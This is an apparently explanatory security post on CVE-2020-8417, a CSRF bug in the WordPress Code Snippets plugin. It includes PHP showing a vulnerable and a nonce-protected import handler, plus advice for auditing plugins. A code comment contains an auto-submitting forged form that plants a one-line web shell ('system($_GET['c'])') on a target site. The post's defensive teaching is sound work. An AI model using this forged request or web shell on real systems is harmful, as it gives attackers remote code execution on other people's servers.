Over 200k WordPress sites possibly exposed to attack due to Code Snippets flaw

More than 200k WordPress sites are exposed to attack due to a high-severity CSRF (cross-site request forgery) bug in the Code Snippets plugin.

The plugin lets users run custom PHP snippets without adding them to their theme's functions.php file.

Code Snippets also provides a graphical interface, similar to the Plugins menu, for managing snippets.

Snippets can be activated and deactivated just like plugins.

An attacker could exploit this CSRF vulnerability to forge a request on behalf of a logged-in administrator and inject code into a vulnerable site, potentially allowing remote execution of arbitrary PHP on WordPress installs running a vulnerable version of Code Snippets. Because the plugin's whole purpose is to execute stored snippets, a forged import of a malicious snippet is effectively remote code execution.

This vulnerability is tracked as CVE-2020-8417.

The NVD description of the vulnerability is as follows:

The Code Snippets plugin before 2.14.0 for WordPress allows CSRF because of the lack of a Referer check on the import menu.
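To make the bug class concrete, here is an added PHP illustration of a WordPress admin "import snippet" action, first without any CSRF protection (the pattern behind CVE-2020-8417) and then guarded with the standard WordPress nonce check. This is not the Code Snippets plugin's own code: every name prefixed hypo_ is invented for this example, the attacker page at the bottom is constructed for illustration, and the attacker side goes slightly beyond what the page itself describes. The NVD text calls the missing control a Referer check; WordPress's usual mechanism for the same purpose is a nonce verified with check_admin_referer(), which is stronger because the Referer header can be absent or stripped.

```php
<?php
/**
 * Added illustration, not the Code Snippets plugin's own code.
 *
 * A hypothetical WordPress admin action that imports a PHP snippet submitted
 * through a form, shown without a CSRF check and then with the standard
 * WordPress nonce check. Names prefixed hypo_ are invented for this example.
 */

// Where an imported snippet ends up. A real snippet manager later eval()s or
// includes the stored code, which is why a forged import equals code execution.
function hypo_store_snippet( $code ) {
    $snippets   = get_option( 'hypo_snippets', array() );
    $snippets[] = $code;
    update_option( 'hypo_snippets', $snippets );
}

/*
 * VULNERABLE: only checks that the caller is an administrator. An admin who is
 * logged in and visits an attacker's page is tricked into sending this request
 * with their own session cookie; nothing ties the request to the real import form.
 */
function hypo_import_snippet_vulnerable() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges', '', array( 'response' => 403 ) );
    }
    hypo_store_snippet( wp_unslash( $_POST['snippet_code'] ?? '' ) );
    wp_safe_redirect( admin_url( 'admin.php?page=hypo-snippets&imported=1' ) );
    exit;
}

/*
 * HARDENED: check_admin_referer() verifies a nonce bound to the logged-in user
 * and to the action name, and calls wp_die() on failure. The attacker's page
 * cannot read the nonce out of the admin's form (same-origin policy), so the
 * forged request cannot carry a valid one.
 */
function hypo_import_snippet_hardened() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges', '', array( 'response' => 403 ) );
    }
    check_admin_referer( 'hypo_import_snippet', 'hypo_nonce' );
    hypo_store_snippet( wp_unslash( $_POST['snippet_code'] ?? '' ) );
    wp_safe_redirect( admin_url( 'admin.php?page=hypo-snippets&imported=1' ) );
    exit;
}

// The legitimate import form: wp_nonce_field() emits the hidden nonce input
// that check_admin_referer() expects (action and field name must match).
function hypo_render_import_form() {
    ?>
    <form method="post" action="<?php echo esc_url( admin_url( 'admin-post.php' ) ); ?>">
        <input type="hidden" name="action" value="hypo_import_snippet">
        <?php wp_nonce_field( 'hypo_import_snippet', 'hypo_nonce' ); ?>
        <textarea name="snippet_code"></textarea>
        <button type="submit">Import</button>
    </form>
    <?php
}

// Register the hardened handler for logged-in users via wp-admin/admin-post.php.
add_action( 'admin_post_hypo_import_snippet', 'hypo_import_snippet_hardened' );

/*
 * What the attacker hosts (constructed for illustration). Against the vulnerable
 * handler this succeeds for any administrator who loads the page while logged
 * in to victim.example; against the hardened handler the request fails the
 * nonce check because the hypo_nonce field is missing.
 *
 * <form method="post" action="https://victim.example/wp-admin/admin-post.php" id="f">
 *   <input type="hidden" name="action" value="hypo_import_snippet">
 *   <input type="hidden" name="snippet_code"
 *          value="&lt;?php system($_GET['c']); ?&gt;">
 * </form>
 * <script>document.getElementById('f').submit();</script>
 */
```

When auditing a plugin for this class of bug, look for every handler hooked to admin_post_*, admin_menu page callbacks, or admin-ajax.php that changes state, and confirm it calls check_admin_referer() or wp_verify_nonce() in addition to the capability check; a capability check alone, as in the vulnerable handler above, does not stop a forged request from the victim's own browser.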

Thanks for reading; I hope you found this post useful.
